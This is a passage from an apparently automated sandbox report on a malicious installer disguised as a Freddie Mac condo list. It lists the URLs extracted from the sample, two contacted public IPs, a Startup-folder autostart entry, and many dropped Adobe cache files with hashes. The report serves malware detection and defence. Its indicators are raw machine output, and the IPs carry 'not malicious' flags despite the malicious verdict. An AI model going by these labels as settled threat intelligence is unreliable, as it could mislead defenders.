http://ocsp.sectigo.com0	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.certum.pl/ctnca.crl0k	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
https://www.remobjects.com/ps	Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000003.255111347.000000007FB50000.00000004.00000001.sdmp, Freddie-Mac-Warrantable-Condo-List.tmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com01	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.innosetup.com/	Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000003.255111347.000000007FB50000.00000004.00000001.sdmp, Freddie-Mac-Warrantable-Condo-List.tmp, Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000000.257520035.0000000000401000.00000020.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.coT	powershell.exe, 0000000B.00000002.437088774.0000000007A1C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0D	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://jrsoftware.org0	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://jrsoftware.org/	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
https://www.certum.pl/CPS0	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000A.00000002.403581267.0000000004CF1000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.405501302.0000000004D51000.00000004.00000001.sdmp	false		high
http://crl.certum.pl/cscasha2.crl0q	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
http://www.certum.pl/CPS0	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdline	Freddie-Mac-Warrantable-Condo-List.exe	false		high
http://cscasha2.ocsp-certum.com04	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
167.88.15.115	unknown	United States		20278	NEXEONUS	false
5.254.118.226	unknown	United Kingdom		3223	VOXILITYGB	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	473045
Start date:	28.08.2021
Start time:	00:03:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Freddie-Mac-Warrantable-Condo-List.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.rans.evad.winEXE@51/650@0/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 19.7% (good quality ratio 19.4%) Quality average: 77.1% Quality standard deviation: 23.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 23.54.113.104, 23.10.249.187, 23.0.174.233, 23.54.113.182, 20.82.210.154, 23.10.249.43, 23.10.249.26 Excluded domains from analysis (whitelisted): fs.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, acroipm2.adobe.com, arc.msn.com, e12564.dspb.akamaiedge.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, store-images.s-microsoft.com, a122.dscd.akamai.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Execution Graph export aborted for target powershell.exe, PID 4424 because it is empty Execution Graph export aborted for target powershell.exe, PID 5312 because it is empty Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:05:05	API Interceptor	330x Sleep call for process: powershell.exe modified
00:05:07	API Interceptor	16x Sleep call for process: RdrCEF.exe modified
00:05:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a65a7aeb5fe4978dc705b96d177e7.LNK

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	615
Entropy (8bit):	5.687003710814478
Encrypted:	false
SSDEEP:	12:vDRM9OeZiEXvDRM9jZdZZiEhDRM9L9dZZiEzl:7XELfE1I4Ez
MD5:	44E6145D5BE88E629D9603D747E088E1
SHA1:	2331C14D5CEF32B0566F22D1AF60A713F61E8124
SHA-256:	3ECCBBE4798A66962CD9E427B11E312E4F2AE9952360A303999C942FA3CF035F
SHA-512:	50584B3AFB97E86F5DB6F99E5506E4D2570966828F2E7095D38658091D5A535F7EC51ECE9534B25E09A23B7E1B55E7D8B565E89CAB9F3D33F19308A352F8AECA
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .e.H./)/....."#.D.>.xJ.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo.........x........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ...}./)/....."#.D....xJ.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo.......X5.........0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ..../)/....."#.D!.2.xJ.A....d.{v.^.G...d.W.:...P..k%..A..Eo...................A..Eo......k6.S........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.590595853305039
Encrypted:	false
SSDEEP:	6:mi9NqEYOFLvEk5qjism1tV8Be7Ywcr1TK6tq2i9NqEYOFLvEkorFZ8Be7Ywcr1TM:V9zUjismt9PQcl9zQz9PQM9zdn9PQs
MD5:	D14743DB3653047899466DC0E908C158
SHA1:	AAF754E277D0D4A78ADD624656FBF809D87F8BE3
SHA-256:	C9429B4007178F0D828AF28A14CCCD4E6948480E3181D940368E292EADB09D9C
SHA-512:	B0DDC9F1215DC0BD335F837694F98186CF9A2978A6763FE70CF69DC40DE8894D3CEDB40FF99627AF28BE17C0E4CBA92EB84CAF97F4250C0589E8947E36FA4137
Malicious:	false
Reputation:	unknown
Preview:	0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .v.../)/....."#.D.I..xJ.A.1.x.'.vI..\|Z..o...+.4....0..A..Eo...................A..Eo......P.O.........0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .#.G./)/....."#.D...xJ.A.1.x.'.vI..\|Z..o...+.4....0..A..Eo...................A..Eo.......P?D........0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ...K./)/....."#.D..2.xJ.A.1.x.'.vI..*\|Z..o...+.4....0..A..Eo...................A..Eo......S..n........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	738
Entropy (8bit):	5.5763441289635995
Encrypted:	false
SSDEEP:	12:DyeRVFAFjVFAFhBlUo6jm5yeRVFAFjVFAFQNlUo6jPTyeRVFAFjVFAFdwUlUo6j:tB4v4hBSBm3B4v4QNSBPdB4v4yUSB
MD5:	618680DBAF177DF212299008FB161302
SHA1:	5039150176BECE853AE6329A1D882100AEFBFEDE
SHA-256:	630AD05B411EC977AABD86B65AE29014DD848F615DC57314D08F19DC74C02F07
SHA-512:	3AB63613D0D77855DAD4BC052D0CC30048DE609F9A17A3A9E43360D22B4317EF034A6429CF2387AC0F0692704C31BE562E39249474DA6AAC680B7190290E946D
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .ve../)/....."#.D..4.xJ.A..hvDO.N.t@.....n....... ....A..Eo...................A..Eo.........y........0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ..eu./)/....."#.D....xJ.A..hvDO.N.t@.....n....... ....A..Eo...................A..Eo.......g.........0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .../)/....."#.D..-.xJ.A..hvDO.N.t@.....n.*...... ....A..Eo...................A..Eo.......].h........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	modified
Size (bytes):	232
Entropy (8bit):	5.639348727086071
Encrypted:	false
SSDEEP:	6:mNtVYOFLvEWdFCi5Rsf7KoiWulHyA1TK6tA:IbRkiD+7uWuss2
MD5:	74020060DA933C94DCE99F4363E14203
SHA1:	3E3EC2CEE7B93B5B971F0A62FCAFB12409F6AD6D
SHA-256:	75B6AC31FD2033DF006C3B5D7F32698C27A9095CB07BEFFFD91A052D46BB384E
SHA-512:	CC5B7254CD901B9F26905F758DD8FBD1740AD388A33B375F2FE546F0BC6ACC540DA6D17F8AC4BFE2503E54A4D0799176F8DE470334F351DCD80C8D7D61BB4DCD
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js .:{../)/....."#.D$.T.xJ.A..8 P..a...R..Y....7.@..2Dm{..A..Eo...................A..Eo........Y@........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	420
Entropy (8bit):	5.587589570032334
Encrypted:	false
SSDEEP:	6:m+yiXYOFLvEWd7VIGXVuz9KyVyh9PT41TK6tK+yiXYOFLvEWd7VIGXVut+TJNPV9:pyixRuF93V41TEbyixRuaTnPV41TE
MD5:	37454388A33096D8BBCFDEE70D19C00E
SHA1:	E9751264CD7D325BB8545A837E05F06908E5E9CC
SHA-256:	EE5C008CAD7FE2565E403AAD84234F660B69913B1515AC2F5B4C586FA84CEC15
SHA-512:	54B39BD51915CC626A081825625255326505F72B85CADC1E17D1D2373064417ADC6D29FFE26143D3660A30E303A3694B6D755003A4FB1AB4F70B029309439FB5
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js .<.G./)/....."#.D.c3.xJ.Ak.Q.....-_..y.....O...>..1....A..Eo...................A..Eo................0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ."Lw./)/....."#.D#...xJ.Ak.Q.....-_..y.....O...>..1....A..Eo...................A..Eo.................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.639057531454952
Encrypted:	false
SSDEEP:	6:mvYOFLvEWdhwjQvpEhgNLZIl6P41TK6t5EvYOFLvEWdhwjQo+x7NLZIl6P41TK6t:0RhkGEwLZCPyRhkj+bLZC
MD5:	CCD80F6B59E3A8A89178E725C7E641A6
SHA1:	3EFC44E629072F0DC985F8125E96FFE01D613735
SHA-256:	7AD2215C1A025A03EF581AF22C28A9D2A3E501CB83CBCF0FE5FFB5A195C41EA1
SHA-512:	73928103ECAAAE0BE7C5016EE4D399D4B97FB3EF5B07126172EDEDC23FFA07BF986524271EB3239E614B61076A2F63EAE89889A251B288AB2BA9D76B35264EC3
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ..../)/....."#.D...xJ.A.].>....uUf..N...k......c..l.A..Eo...................A..Eo....... M.........0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js .4vo./)/....."#.D...xJ.A.].>....uUf..N...k......c..l.A..Eo...................A..Eo......b.v.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.512332831788098
Encrypted:	false
SSDEEP:	6:mJYOFLvEWdGQRQOdQFFM06g1TK6tnJJYOFLvEWdGQRQOdQDpc96g1TK6t64:2RHRQCQFM01bRHRQCgpc9144
MD5:	90F5F25CBABCEF86468C91DF0418F701
SHA1:	15499D75FB498FA22521B2206A651D17756F6FD3
SHA-256:	C7A7662C4B88543CE4FEDA15D73D7524FE468A58A9CFCC475669851CDAF99ABC
SHA-512:	7D94EE69CC9148EB87EC8A093A432F965A24681F4D638B0845E6F8557679281643CA1A998A2EB4A9ED376533EEA269A4C4A00B49C7B3C134684AA6F5DB3E9C6C
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .+.H./)/....."#.DJ\|3.xJ.A..c..y/L....\|y.n..C/I.....X7-ne.A..Eo...................A..Eo........s)........0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .S.{./)/....."#.D....xJ.A..c..y/L....\|y.n..C/I.....X7-ne.A..Eo...................A..Eo..................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	537
Entropy (8bit):	5.588841316376382
Encrypted:	false
SSDEEP:	12:Z5MIvMuR/ES5MrS3MuR/EX5M7xUMuR/E:ZSDuR/ESS+8uR/EXS1NuR/E
MD5:	C0996ABCAB23DD0A746C82AA28C8BE3A
SHA1:	2AF4B0B86394A2C3427726BEEDC3C764BF364B7F
SHA-256:	2F9E41FBFD3E3F9E79E5D13EB5C5BCB45B6D8D9B05178D26518A4993E9D79BCF
SHA-512:	1AE21CB81A69FB30B065F66A7BB5E6B325320C72D4A1E642C5D9222AE593131091BA851E6F34D7A7CC2402C7927312E50C5D6BF5E6E28F6A92D5E3E716AE3518
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ...../)/....."#.D.~..xJ.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo......M...........0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ...G./)/....."#.D....xJ.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo.......W.w........0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..xL./)/....."#.D..2.xJ.A.y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo...................A..Eo.......mP.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	212
Entropy (8bit):	5.615662303799289
Encrypted:	false
SSDEEP:	6:mGpYOFLvEWdzAAubSm0bbsIDMGH41TK6t:XfRMLKsIZE
MD5:	102A9C8FB29B1B8574C81594B31C7B13
SHA1:	F47C614C1DD6F3818A14889732A753C09121C6DB
SHA-256:	F22D51A0FFAE245FB1EB276FCC14368E82D52FD0045C0403E995CDD6A26A68BC
SHA-512:	AB70DE2E3D257F56E636B9C6E16E7BFC038E0257A2EF1B9F3BC72455B2CAF8BB7734F51B67A2781A333CDFF21586F66A77DE49EBB4FA9201B881A07975F15937
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......T....,.^...._keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/selector.js .~vc./)/....."#.D....xJ.A..`.....^....L>..Xa./......C.y.A..Eo...................A..Eo........O.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.554638881920192
Encrypted:	false
SSDEEP:	6:m4fPYOFLvEWdtuZl9HMby0zBUKSAA1TK6t+5E4fPYOFLvEWdtuY8lJGCMby0zBU5:pRElubewNRr8labe
MD5:	27E3C48A319BFFDF2ECB79CED5559AA3
SHA1:	5F0A0891487FD0F004E122C7C5B41A3D925F1979
SHA-256:	C755DB1F4C96967BF51080D5D1880C76427EC8241B4D696DAAE76C43030C9EC3
SHA-512:	065301D3003D6CC376E07FB6F315457E19CE423C749216E57AF5FC1D4835F84B1D3BDBBCE016658C65A11E42A47F9E82C1C76813A298C72640F0A01B60C17853
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js .?.J./)/....."#.D..K.xJ.AQ..E.=....=h`t..t..3%A.F$..w..A..Eo...................A..Eo........V........0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js ..f../)/....."#.D.V..xJ.AQ..E.=....=h`t..t..3%A.F$..w..A..Eo...................A..Eo........N.........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	531
Entropy (8bit):	5.593308102500499
Encrypted:	false
SSDEEP:	12:KkXxKMSCvYvuvtUl94kXxKMSCvcPvtUlZkXxKMSCvtbvtUl:KkXxiCAGvWSkXxiC0PvWZkXxiCFbvW
MD5:	360866BA008AEF6A5EFCD12EBE7255E3
SHA1:	237D9C1ADE2A559E8FDDC5A6FC7F1D5CA79072FA
SHA-256:	2DB67F19C9B96CC5BFA36E573CDE2D2BACD20640D5191A8CCB37300FB44E26D3
SHA-512:	E3FDFAB7574E9701AD13D5A394F0CABAC4EC3EAE43830741D20005120A98FF7E58C01A7D899ABF00EAC9473280F023F0143F3DC88D36543499B5D34635AA0686
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js .K.../)/....."#.DHk..xJ.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo......BA.9........0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ...G./)/....."#.D...xJ.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo......C`..........0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js .>uL./)/....."#.D..2.xJ.A.PU ....t^.....a.k..u.7.M.BW6#}..A..Eo...................A..Eo......K.4........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	561
Entropy (8bit):	5.625985264041575
Encrypted:	false
SSDEEP:	6:mkl9YOFLvEWsfOLxF+JyM+VY1TK6taHekl9YOFLvEWsfOLxyyM+VY1TK6t3FEklk:5h6OLNkUBh6OLxfkfh6OLR/k
MD5:	C495FF25837AE03B55866A3996C5F8FC
SHA1:	A93FDD11D9B5C6AC76D695B24B5B228DB13303D3
SHA-256:	C64AC07CA8D4A17BA5ADCC68AB24C679A727583A8682CB39BA84C760A090E0A9
SHA-512:	79A653AD92241E494FA3A487BD859120292265A248753A3D75734D64E0700730A10A6774821261A6448965B4216748D997B46BD0FF40128E71023EBC41865BAF
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .7D./)/....."#.D..4.xJ.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo........p........0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ...e./)/....."#.D....xJ.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo.................0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .^7v./)/....."#.D....xJ.A..q.O...j....._y..L^z...?..@N..A..Eo...................A..Eo.......A..........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	732
Entropy (8bit):	5.628795327457641
Encrypted:	false
SSDEEP:	12:URVFAFjVFAFqGwSeKaTLnYZRVFAFjVFAFKXwSeKaTLne8RVFAFjVFAFbwSeKaTLR:UB4v4qGwzXLnkB4v4KXwzXLntB4v4bwf
MD5:	610C433BE622471A1BE74F3A4DD13D83
SHA1:	BD255DA35EF9DD5F5366F27F433A2C74AA740DD3
SHA-256:	CA5F7EFB415D4FBC29780DB83B7E4C1469845629DD644C93B0AAA75642CE420C
SHA-512:	BF19F441FE0CFFB52F5A4A1B219DEBA03CB4FBE179406162B4386E81E7C053C495928E49AC3AA29ACFA3044798B7821FE73D95FDC65260F5898642A54713748F
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js .&0G./)/....."#.D..:.xJ.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo..................0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ...z./)/....."#.Ds...xJ.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo......s,.1........0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..../)/....."#.D.:/.xJ.A......H...{...2../.k`..r4.C. .A..Eo...................A..Eo.......@.'........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	5.535685370813946
Encrypted:	false
SSDEEP:	6:mq9YOFLvEWdzAHdQ9YUNz5GFCaa+41TK6t:NRMHdKvNz5Gda+E
MD5:	8CE80E1EB1401CBC74DA6570F85B06D7
SHA1:	1325123D0E7106FCB1307C2526C7F7F5D7A540A0
SHA-256:	2DB3378F0DD792CFCC98A04E915CAC79A794D5957ED3591B80ED2D7E13EB328D
SHA-512:	5E055DFBB899E1E1FC6092057B399A9B9D808494822038992E340316219549D33F2FA3A982B4FFCBCE33C5B8A299B0162B0F3280B0BBF82A285414F5176DDC06
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......R....L......_keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/plugin.js .[xc./)/....."#.DC<..xJ.A...G.3D.....Q.g0...._.Q.........A..Eo...................A..Eo......2..........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.508456653959263
Encrypted:	false
SSDEEP:	6:ms2VYOFLvEWdvBIEGdeXujUR11TK6tY/Es2VYOFLvEWdvBIEGdeXu8Dgr11TK6t:BsR2EseXP+TsR2EseJ0J
MD5:	29A115A9B704FD60D41EFC324CA8E12D
SHA1:	E1BB512B2129476613153260A8E5A4C272DA6F19
SHA-256:	358665FC7FCC9F20106B90AD7E0E472E937A62F8A1D3D1CD75A2FE4F13A77316
SHA-512:	4EB6D8534573E75EF46C0A04F62B40F98F8C42FF05681DE9C67D21E20C174F48960AF4B578CB140F9BAB97FAE6E090F8D62E9000F976C99D33ED2CB57AB2D792
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js .d.../)/....."#.Dr.6.xJ.A.A.o]@r..Q.....<w.....].n\....A..Eo...................A..Eo...... ...........0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..Iv./)/....."#.D....xJ.A.A.o]@r..Q.....<w.....].n\....A..Eo...................A..Eo........}D........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	404
Entropy (8bit):	5.649813278778576
Encrypted:	false
SSDEEP:	6:maVYOFLvEWdwAPCQUY4B7OhKlvA1TK6tK2aVYOFLvEWdwAPCQrT64B7OhKlvA1TD:RbR16XY4BJkUbR16mT64BJk
MD5:	9BE2FBA77852E129E42F8EE416264A34
SHA1:	FDDF145CAF2D62EA4DDCE8C6FDB8182B8B386E67
SHA-256:	4A43211D060AAF9F444AC7DBF8AC473F9384E48DD93D7EC905926E3E50C66BDA
SHA-512:	50FB6481978D3154C9BBD3870A5123A8CE02D5A67DE7F791C06D390926A1D897314AB42FA8917FBAD0C32B778179176D293165164ABDCE3DBFBD6BEE643B69F3
Malicious:	false
Reputation:	unknown
Preview:	0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js .}../)/....."#.D....xJ.A..4T].....Tw.....(..b...EO....9.A..Eo...................A..Eo.........x........0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js .D.n./)/....."#.D....xJ.A..4T].....Tw.....(..b...EO....9.A..Eo...................A..Eo......X...........

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0 Download File
Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.601383075182563
Encrypted:	false
